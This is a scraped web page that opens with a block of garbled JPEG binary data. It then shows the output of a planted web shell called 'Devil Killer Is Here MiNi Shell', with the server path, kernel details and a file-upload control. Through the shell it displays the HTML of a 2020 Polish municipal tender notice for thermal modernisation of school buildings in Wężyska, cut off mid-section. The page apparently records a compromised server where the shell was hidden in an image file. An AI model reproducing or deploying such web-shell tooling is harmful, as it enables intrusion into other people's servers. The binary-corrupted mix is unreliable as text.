JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200604/547287-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 547287-N-2020 z dnia 2020-06-04 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Krosno Odrzańskie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Termomodernizacja budynku Zespołu Szkół w Wężyskach oraz budynku o wielu funkcjach użytkowych w Wężyskach, z podziałem na części </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Zamówienie jest realizowane w ramach Regionalnego Programu Operacyjnego – Lubuskie 2020, w ramach projektu Termomodernizacja budynku Zespołu Szkół w Wężyskach oraz budynku o wielu funkcjach użytkowych w Wężyskach</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Krosno Odrzańskie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">97077026700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Parkowa</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">66-600</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Krosno Odrzańskie</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubuskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">683 835 017</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">r.slupski@krosnoodrzanskie.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">683 835 122</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.wrota.lubuskie.pl/ugkrosnoodrzanskie/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.wrota.lubuskie.pl/ugkrosnoodrzanskie/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.wrota.lubuskie.pl/ugkrosnoodrzanskie/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy składać w siedzibie zamawiającego – Gmina Krosno Odrzańskie, ul. Parkowa 1, 66-600 Krosno Odrzańskie, w sekretariacie (BOI). Termin składania ofert upływa dnia 19 czerwca 2020r. o godz. 7:45 czasu lokalnego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Parkowa 1, 66-600 Krosno Odrzańskie, w sekretariacie (BOI)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Termomodernizacja budynku Zespołu Szkół w Wężyskach oraz budynku o wielu funkcjach użytkowych w Wężyskach, z podziałem na części </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PR.272.2.2020.RN</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2 (wykonawca moze złożyć ofertę na cześć I, cześć II lub obie na części ).</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest termomodernizacja budynku Zespołu Szkół w Wężyskach oraz budynku o wielu funkcjach użytkowych w Wężyskach, zgodnie z posiadaną dokumentacją.Zamawiający przewiduje możliwość składania ofert częściowych na zadania: - Część I –Termomodernizacja budynku Zespołu Szkół w Wężyskach, - Część II – Termomodernizacja budynku</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71220000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71240000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45400000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>09300000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45210000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45260000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45320000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45420000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45450000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>09331200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45261215-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45261900-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45315300-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45315600-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45315700-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45321000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421100-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45450000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45453000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71232310-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Określenie warunków: Część I Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, żeposiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 400.000,00 zł(słownie: czterysta tysięcy złotych 00/100) Wykonawcy wspólnie ubiegający się o udzieleniezamówienia mogą spełniać ten warunek razem. Część II Warunek ten zostanie spełniony, jeżeliWykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości niemniejszej niż 400.000,00 zł (słownie: czterysta tysięcy złotych 00/100) Wykonawcy wspólnieubiegający się o udzielenie zamówienia mogą spełniać ten warunek razem.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Część I Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzeniadziałalności jest krótszy – w tym okresie wykonał minimum 1 zadanie porównywalne zprzedmiotem zamówienia tj. polegające na wykonaniu remontu, przebudowy lub modernizacjiobiektu budowlanego obejmującego między innymi prace termomodernizacyjne polegające nadociepleniu przegród o minimalnej łącznej wartości nie mniejszej niż 700.000 PLN, popartedokumentami (dowodami) potwierdzającymi, że roboty zostały wykonane w sposób należytyzgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. poświadczenie). Część IIWarunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 5 lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tymokresie wykonał minimum 1 zadanie porównywalne z przedmiotem zamówienia tj. polegające nawykonaniu remontu, przebudowy lub modernizacji obiektu budowlanego obejmującego międzyinnymi prace termomodernizacyjne polegające na dociepleniu przegród o minimalnej łącznejwartości nie mniejszej niż 700.000 PLN, poparte dokumentami (dowodami) potwierdzającymi, żeroboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej i prawidłowoukończone (np. poświadczenie).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. Wykonawca do oferty dołącza aktualne na dzień składania ofert oświadczenie, że wykonawcaspełnia warunki udziału w postępowaniu, o których mowa w pkt 10.1 SIWZ, w zakresiewskazanym przez zamawiającego we wzorze stanowiącym załącznik nr 2 do SIWZ. 2. Wykonawcado oferty dołącza aktualne na dzień składania ofert oświadczenie, że wykonawca nie podlegawykluczeniu z udziału w postępowaniu, na podstawie przesłanek określonych w pkt 10.4 SIWZ wzakresie wskazanym przez Zamawiającego we wzorze stanowiącym załącznik nr 3 do SIWZ.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA 